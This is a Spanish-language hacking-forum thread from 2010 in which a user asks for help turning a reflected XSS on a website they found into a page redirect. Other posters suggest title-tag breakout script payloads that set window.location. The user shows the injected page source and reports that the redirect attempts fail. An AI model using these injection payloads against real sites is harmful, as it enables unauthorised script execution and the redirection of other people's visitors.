Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Bugs y Exploits => Hacking => Nivel Web => Mensaje iniciado por: kamikazeeee en 31 Octubre 2010, 06:03 AM

Título: Ayuda con XSS
Publicado por: kamikazeeee en 31 Octubre 2010, 06:03 AM
hola! les cuento, encontré una web vulnerable a xss, intenté de varias formas pero ninguna funcionó, Pero Sí con ésta:

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

muestra el alert.

ahora, quiziera redireccionar la página a otro lugar, cómo podría hacerlo?

intenté con </TITLE><SCRIPT>window.location = "http://www.url.com";</SCRIPT> pero no va

Disculpas por la ignorancia, y gracias por la ayuda!

Título: Re: Ayuda con XSS
Publicado por: Shell Root en 31 Octubre 2010, 16:53 PM
Simon así es,
Código (javascript) [Seleccionar]
</title><script>window.location = "http://www.mozilla.com/es-MX/";</script>
Título: Re: Ayuda con XSS
Publicado por: kamikazeeee en 31 Octubre 2010, 18:41 PM
Cita de: Shell Root en 31 Octubre 2010, 16:53 PM
Simon así es,
Código (javascript) [Seleccionar]
</title><script>window.location = "http://www.mozilla.com/es-MX/";</script>

Eso es lo que dije que ya probé, y no funcionó :/
Título: Re: Ayuda con XSS
Publicado por: xassiz~ en 31 Octubre 2010, 20:08 PM
Revisa el código que le queda a la página después de su ejecución, a ver dónde está el fallo :P
Título: Re: Ayuda con XSS
Publicado por: kamikazeeee en 31 Octubre 2010, 20:28 PM
El código queda así:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></TITLE><SCRIPT>alert("XSS");</SCRIPT></title><meta content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>" property="og:title"/><meta name="description" content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>"
Título: Re: Ayuda con XSS
Publicado por: xassiz~ en 31 Octubre 2010, 21:37 PM
Prueba:
Código (javascript) [Seleccionar]

</title>"><script>window.location.href='http://www.mozilla.com/es-MX/';</script>
Título: Re: Ayuda con XSS
Publicado por: kamikazeeee en 1 Noviembre 2010, 00:19 AM
no funcionó